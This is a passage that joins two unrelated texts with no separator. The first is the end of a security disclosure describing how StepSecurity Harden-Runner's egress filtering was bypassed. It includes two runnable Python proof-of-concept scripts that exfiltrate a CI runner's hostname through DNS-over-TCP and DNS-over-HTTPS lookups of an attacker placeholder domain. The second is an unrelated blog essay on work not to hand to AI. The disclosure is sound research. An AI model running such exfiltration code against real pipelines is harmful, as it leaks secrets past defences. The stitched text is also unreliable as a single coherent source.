[Screenshot: StepSecurity dashboard (our C2 domain is not getting flagged)]
[Screenshot: data exfiltration to our C2]
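Here's the same trick sketched in Python rather than the original dig one-liner. This is a reconstruction, not the original PoC: attacker-domain.example is a placeholder for the C2 domain, and the dnspython package is assumed.

```python
# DNS-over-TCP exfiltration sketch: a TXT lookup for an attacker-controlled
# name, sent over TCP (not UDP) to Google's public resolver.
import socket

import dns.message  # dnspython
import dns.query

# The stolen data rides in the subdomain labels of the C2 domain.
exfil_name = f"{socket.gethostname()}.attacker-domain.example"

query = dns.message.make_query(exfil_name, "TXT")
# TCP on port 53 is what slips past the egress policy undetected.
response = dns.query.tcp(query, "8.8.8.8", timeout=5)
print(response.id)
```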
Egress Policy Bypass via DNS over HTTPS — Proxying DNS queries using Google's resolver

DNS over HTTPS (DoH) wraps DNS queries inside standard HTTPS requests. From the network's perspective, a DoH request to dns.google looks like a normal HTTPS connection to a well-known endpoint. Harden-Runner sees it and lets it through.

The idea is simple: use dns.google as a proxy. An attacker crafts a DNS query where the domain being resolved is attacker-controlled, sends it as an HTTPS POST to dns.google, and Google's resolver forwards it to the attacker's authoritative nameserver. The data is encoded in the subdomain labels — the runner's hostname, environment variables, secrets, whatever fits. The egress filter sees an HTTPS connection to a legitimate destination. It never inspects what's inside. The attacker's domain never appears in any connection log.

Proof of Concept

The workflow sets up Harden-Runner with a restrictive policy, then runs a Python script that exfiltrates the runner's hostname via DoH through Google's resolver. The script builds a DNS wire-format query with the runner's hostname encoded as a subdomain, then sends it as a DoH request to dns.google.
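The script itself isn't reproduced here, but a minimal reconstruction of what it describes looks something like this (attacker-domain.example again stands in for the real C2 domain):

```python
# DoH exfiltration sketch: a hand-built RFC 1035 wire-format TXT query,
# POSTed to Google's RFC 8484 endpoint as an ordinary HTTPS request.
import socket
import struct
import urllib.request

C2_DOMAIN = "attacker-domain.example"  # placeholder for the attacker's domain

def wire_query(name: str) -> bytes:
    """Minimal DNS query packet: 12-byte header plus one TXT/IN question."""
    header = struct.pack(">HHHHHH", 0x1337, 0x0100, 1, 0, 0, 0)
    labels = b"".join(
        bytes([len(part)]) + part.encode() for part in name.split(".")
    )
    return header + labels + b"\x00" + struct.pack(">HH", 16, 1)  # TXT, IN

payload = wire_query(f"{socket.gethostname()}.{C2_DOMAIN}")
request = urllib.request.Request(
    "https://dns.google/dns-query",
    data=payload,
    headers={"Content-Type": "application/dns-message"},
)
# To the egress filter, this is just another HTTPS connection to dns.google.
with urllib.request.urlopen(request) as response:
    print(response.status, len(response.read()))
```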

[Screenshot: PoC execution]
[Screenshot: StepSecurity dashboard (our C2 domain is not getting flagged)]
[Screenshot: data exfiltration to our C2]

Harden-Runner shows 1 destination (dns.google), 0 HTTPS events, and 0 detections. The Collaborator server receives the DNS query with the runner's hostname. Data exfiltrated cleanly through a permitted HTTPS connection — dns.google acted as an unwitting proxy.

Disclosure Timeline

Both vulnerabilities were reported to the StepSecurity team in early December 2025 via GitHub Security Advisories, with the standard 90-day disclosure window applied and the blog post date set for mid-March 2026. StepSecurity acknowledged the reports over email, but my last follow-up message on the advisories asking for updates went unanswered, and no CVE was issued. These were tested against the community version of Harden-Runner (v2.13.3). It's possible this was addressed in step-security/agent#469, but I have not tested it. Since the 90-day disclosure window has passed and I did not hear back about a CVE, I am disclosing now. CVEs are pending.

Discovery & Report (DNS over TCP): 4th December 2025 (GHSA-g699-3x6g-wm3g)
Discovery & Report (DNS over HTTPS): 5th December 2025 (GHSA-46g3-37rh-v698)
Vendor Contact: 4th–5th December 2025
Vendor Acknowledgment: acknowledged over email
Possible Fix: step-security/agent#469 (not tested)
Public Disclosure: 15th March 2026
Jampa.dev 1 month ago

Things I still wouldn’t delegate to AI

When it comes to AI, I consider myself a "skeptical optimist." I think it has come a long way. I even (controversially) put it in my testing pipeline. But sometimes, when I see how others use it, I wonder: are we going too far? I'm not talking just about people simply handing over their email inbox to OpenClaw. I'm referring to major incidents, like how AWS suffered "at least two outages" caused by AI tools.

Code is cheap now, and we can fully delegate it to AI, but coding is only a small part of our jobs. The other parts, like handling incidents caused by AI code, are not. In all the situations below, you'll notice a pattern: people think "AI can handle most of it, so why not all of it?" Here's how that leads to disaster.

The misuse of automation in hiring predates the rise of LLMs. Eleven years ago, I applied for a Django role and got rejected within two minutes, at 1 AM, because I needed to know more about "Python" for the job. The email seemed to be written by a person. I submitted a new application with just one word added and received an interview invitation… The rejection was because the scanner didn't find the word "Python."

The main problem with companies that pull "clever" stunts like these is that they exclude great candidates. Not only that, but people will notice your flaws and share them publicly on platforms like Glassdoor, which can tank your reputation.

Some argue that automation is necessary because applicant volume can become overwhelming. I disagree. During the COVID hiring surge, I reviewed over 1,000 resumes a year and never considered automating screening. The reason you shouldn't automate hiring is that it is the most important thing you do.

Hiring well is the most important thing in the universe. […] Nothing else comes close. So when you're working on hiring […] everything else you could be doing is stupid and should be ignored! — Valve New Employee Handbook

Even with 300 applicants each month, you can review all the resumes in less than an hour by using better judgment than AI. That hour is worth far more than the great candidate you'd otherwise dismiss. Finding the right candidate early also reduces the hours spent on interviews.

Now that people are embedding LLMs into the hiring process, the situation has worsened. I see many pitches for tools that claim to be better at evaluating candidates' interview performance than a human, which is simply absurd. Hiring is a human process: you need to understand not only whether what they say makes sense, but also what excites and motivates them, to see if they'll be a good fit for the role. You can't measure qualities like enthusiasm and soft skills with AI. It will only accept what the candidate says at face value. A candidate might claim they are passionate about working with bank accounting software in Assembly at your Assembly bank firm, but are they really?

From my personal experience with AI review tools like CodeRabbit, Claude, and Gemini, I've noticed that a pull request with 12 issues results in 12 comments, but only about 6 are actual problems. The rest tend to be noise or go unaddressed. This doesn't mean those tools are useless. Letting them do an initial pass is very helpful, and some humans wouldn't catch some of the issues they find, especially the deep logical problems.
The issue with automated review tools is that they are becoming the de facto gatekeepers for deploying code to production, leading to future outages and a low-quality codebase. The inmates have taken over the asylum, and we now have AI reviewing code generated by AI.

Review tools are very focused on checking whether your PR makes logical sense, such as whether you forgot to put auth behind a route, but they can't, for example, judge whether your code worsens the codebase. They can't raise the bar, which is the best part of human reviews. Every time we create or review a PR, it's a chance to learn how to become a better engineer and to leave the codebase in a better state than we found it. Comments from peers like "you are duplicating logic, you should DRY these components" encourage us to review our own code and improve as engineers. Relying only on AI review takes away that chance.

Most incidents I observe happen because AI struggles to evaluate second-order effects; it overlooks the Chesterton fence. For example, an LLM might remove a parameter that looks unused but is still needed downstream, and linting won't catch it. This reflects a limitation of current models: they can't review your code across repos.
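A hypothetical sketch of how that bites (all names invented):

```python
# repo: billing-service/api.py, after an LLM "cleanup" pass.
# The model dropped `currency` because nothing in THIS repo passed it.
def create_invoice(customer_id: str) -> dict:
    return {"customer": customer_id, "currency": "USD"}

# repo: checkout/handlers.py, a different repo the model never saw.
def checkout(customer_id: str) -> dict:
    # Still passes the removed parameter; linting in billing-service is green.
    return create_invoice(customer_id, currency="EUR")

try:
    checkout("cust_42")
except TypeError as exc:
    print(exc)  # ...got an unexpected keyword argument 'currency'
```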
I'm tired of reading AI-generated writing: it just doesn't respect the reader's time. I see many AI-produced texts that could be shortened by a quarter without losing any important information. Reading emails, meeting notes, or technical documents filled with emoji spam and strange analogies ("it's not X, it's Y") is tiring. When I see the words "Executive Summary," I often hesitate to read on.

I would have written a shorter letter, but I did not have the time. — Blaise Pascal

There is power in simplicity and in respecting your reader's time. Most of my blog posts are cut by 50% just before I publish them. Most people I know who use AI for communication do so because they believe their writing is not good. But honestly, the goal of communication isn't grammar skills; it's getting the point across. Good grammar is often overrated anyway. One of my favorite documents is the leaked MrBeast memo PDF, which is full of grammatical and punctuation errors but clearly communicates its message through a "braindump," much better than any LLM ever could.

When you ask an LLM about your roadmap, you're likely querying what countless other companies with very different issues have already tried. The AI relies on patterns from its training data, and in my experience, those patterns tend to be too generic compared to the insights of a seasoned domain expert. If your software is meant for hospital accountants, do you think they take time to blog about the frustrations of their workflow? The knowledge is stored in their minds, and you need to extract it. This vital knowledge is never documented and thus never accessible to an LLM.

I spent three years researching and working on accessibility for nonverbal individuals. If I ask the AI what this industry lacks, it will start discussing the need for better UX solutions (there are countless papers on this; I even naively wrote one). Still, I saw multiple companies enter the market with great UX products only to crash and burn. After a while, I realized that poor-UX apps still dominate adoption because those companies invest millions in lobbying, partnerships with insurance companies, and training, which is the thing no one talks about.

I get many messages from bots on Reddit and LinkedIn about AI management tools, but as I mentioned before, they lack context. The worst part is that they think they can make judgments with the limited context they have. Here's an example of a feedback tool output:

"This engineer sucks, they do 40% fewer PRs than the median, I marked him as an underperformer… I also told your boss, HR and CTO about it, better do something!" - Some tool with a fancy name and a ".io" domain

And yet, that engineer is one of the best I have worked with. The issue is that these tools try to outsmart the manager, which leads lazy managers to use the AI's suggestions as an excuse, resulting in poorly thought-out feedback because "the computer says no."

Think of current LLMs as an "added value" tool, not a product, and definitely not an expert. Most of what I wrote above is problematic because it overestimates what LLMs can do and lets them operate unsupervised. You can't go back in time after AI makes a mistake, and there are no guardrails once a mistake is made.

I received a lot of criticism for my post about using AI to select E2E tests in a PR pipeline. Yes, it sounds crazy, but this is the "added value" part: if the AI fails at selecting the right tests, we will catch it before deployment. The value provided is that having it is better than having no pre-checks at all. Before giving AI control, ask how resilient your system is when (not if) the AI screws up, and ensure you have stronger safety nets before delegating anything completely.
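To make that concrete, here's roughly the shape of the safety net I mean. The names are invented, and ai_select_tests stands in for whatever model call you use:

```python
def ai_select_tests(diff: str) -> list[str]:
    """Placeholder for the actual LLM call that suggests E2E tests."""
    return []  # imagine a parsed model response here

def pick_e2e_tests(diff: str, all_tests: set[str]) -> set[str]:
    # Added value, not gatekeeper: if the model's selection is empty or
    # names tests that don't exist (hallucinated), run the full suite.
    selected = set(ai_select_tests(diff))
    if not selected or not selected <= all_tests:
        return all_tests  # safety net
    return selected

print(pick_e2e_tests("diff...", {"test_login", "test_checkout"}))
```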
